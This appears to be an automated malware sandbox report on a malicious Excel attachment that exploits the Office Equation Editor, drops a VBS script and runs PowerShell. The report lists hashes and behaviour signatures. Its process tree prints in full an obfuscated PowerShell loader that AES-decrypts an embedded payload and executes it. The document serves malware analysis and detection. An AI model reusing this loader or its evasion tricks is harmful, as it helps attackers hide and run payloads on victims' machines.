Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    144s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    26/07/2024, 11:01

General

  • Target

    AWD 490104998518.xls

  • Size

    1.2MB

  • MD5

    f63c009bccbc4d8d26d162a168feaeb1

  • SHA1

    fa8ab13582703932f968a31e6cc0973e45ca43e0

  • SHA256

    f9541983f2c2e2f0a0a72dce180342d0637a52a4ba6e49ea42e8c5844d4de9e3

  • SHA512

    56a099036928c0af89d6a4cde7977cf5f3a5626a028aabea8a4dc590dd582c395042ae2c4f05b8085b81a9d19fb12f18beea0fe145712f057ffc12028e063395

  • SSDEEP

    24576:D6sKGQKr9+FZF+S0ANklw1Q1Ftt5Kj1G8RjM78quuH6OBrNoDgYEMuFh:9Hr9+FZQNw1Q1l5oGYjMhuu3BRo0Yr+

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Abuses OpenXML format to download file from external location
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\AWD 490104998518.xls"
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1760
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2536
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1784
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1708
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\creatednewwaterbottleform.vBS"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:780
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1028

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{7BD7F3F9-6CF2-4A4A-BC63-46B9EAC2ED1D}.FSD

      Filesize

      128KB

      MD5

      50c03fa16fdf5a8dc024333c4d6322f8

      SHA1

      222367043a1b6afc0a895a6e56f6a63d598aac86

      SHA256

      1b2f97568ba5a2edc394f7106fb2549f2db3f26334fe5a816f12b1c2915e0ae8

      SHA512

      8edf05a191797c4be178334ee390794a52565bf9e923367f5bd6e7052e9fc34f2e48dd94913237661dc3b85b57fa67ca53bbe75e29a11a4388fa5045eb4e77ff

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      06affedb3acc140be7fa458b6485a664

      SHA1

      44394b6dc8abdf00f3ac4e38ea52c807b45a655b

      SHA256

      454678244de989a1c49b4bfdbc4581c864364f81dedc3f97b39a0ef8c232b18a

      SHA512

      697e584f399a1608daa92b41a761cbea345356d91b7119bb7726937b424747664df6802e86820d56fb66c6a83526a64b02e7ce58a596102a163af5bee6685b22

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{DB1EAE14-EBAB-4E09-A703-847628820889}.FSD

      Filesize

      128KB

      MD5

      1d480e311ca4db15b0d02303767869ba

      SHA1

      86a1d83bc1ae7513c54a8f73aa8127a6a414c004

      SHA256

      0840c3e53855eb156e0f4c0d3d0923e78ce0da65409f974723cd413ec00a4868

      SHA512

      3dcea1b828e006217439476780c09d7cd8c17d5820419ad3ba45df5b2e5c0714c03c9068d41723c8fa26979975bd71b6d596104653d150da8a73e25c9e578168

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc

      Filesize

      83KB

      MD5

      e03f3290788de4d7a103f16b780b3cce

      SHA1

      c220e79a2714ed59f4d7b1d0a4f6c63a03772ea6

      SHA256

      db4fed8fb3c35582ade2fa57a5866ec7795e94bff34f004f66d15233d1a2fcd8

      SHA512

      9372b124ecb895a5c7672d75d17eb3ea3d91fab5ed675aa82090d8d00c15cb4477553342a356c4f8616869c2987105e6468bb2a912196dab055e06e34ad24b63

    • C:\Users\Admin\AppData\Local\Temp\{1D57E044-7616-45D9-AAF4-163CA8B4DACE}

      Filesize

      128KB

      MD5

      75a65fd301e7502f04f4e1283667ec0f

      SHA1

      880133e60c726ba309f61c970678da2fcefb7346

      SHA256

      6722282816329e4c984c07ce9fc8ef5253c1b568121fe8f65fb4c21c1fa58301

      SHA512

      ef8f8d6fca21f478629089b98661590e6f8960291385a24e511846cf232f54aadeccb6d28578bcd6129a85887b1fa02039386b620b696ccfbd47cc4f65fc7eaa

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      acf86365f0b275c45dde8e7b3b4310ff

      SHA1

      fc440f05f848894b685ea253a3cac557274b94e7

      SHA256

      9b71bb48753fc95d6afb442ed1376ce45662e84c06b2ebebb07938e209b017d5

      SHA512

      b14fdf898bd95b4f42ae3657122340a958c16eae64b934e9641818174fdaa63110c26de9d6ce59d201d5b6e34a641c5e15aa94a750a99703af888651dc075859

    • C:\Users\Admin\AppData\Roaming\creatednewwaterbottleform.vBS

      Filesize

      409KB

      MD5

      94734cb139b6b9025fd8a1acc56027db

      SHA1

      b385368bcaadaca073849a413660b68e690ffba5

      SHA256

      7dde4d5f845dbb2a078f6d0a290472d22cc845c6d6927cc0ada645ce050c7b08

      SHA512

      58e0064f4b304b5503c4a7e689d96cc62bac4bc8ee76d39fede408b9e777b9602334dad4e1570fa0b9e0c363e7d8ee419a41d4da02493d174d61f96acca4053f

    • memory/1760-92-0x0000000072A0D000-0x0000000072A18000-memory.dmp

      Filesize

      44KB

    • memory/1760-8-0x0000000002E20000-0x0000000002E22000-memory.dmp

      Filesize

      8KB

    • memory/1760-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1760-1-0x0000000072A0D000-0x0000000072A18000-memory.dmp

      Filesize

      44KB

    • memory/2536-7-0x00000000036A0000-0x00000000036A2000-memory.dmp

      Filesize

      8KB

    • memory/2536-5-0x0000000072A0D000-0x0000000072A18000-memory.dmp

      Filesize

      44KB

    • memory/2536-93-0x0000000072A0D000-0x0000000072A18000-memory.dmp

      Filesize

      44KB

    • memory/2536-3-0x000000002FA01000-0x000000002FA02000-memory.dmp

      Filesize

      4KB

    • memory/2536-116-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2536-117-0x0000000072A0D000-0x0000000072A18000-memory.dmp

      Filesize

      44KB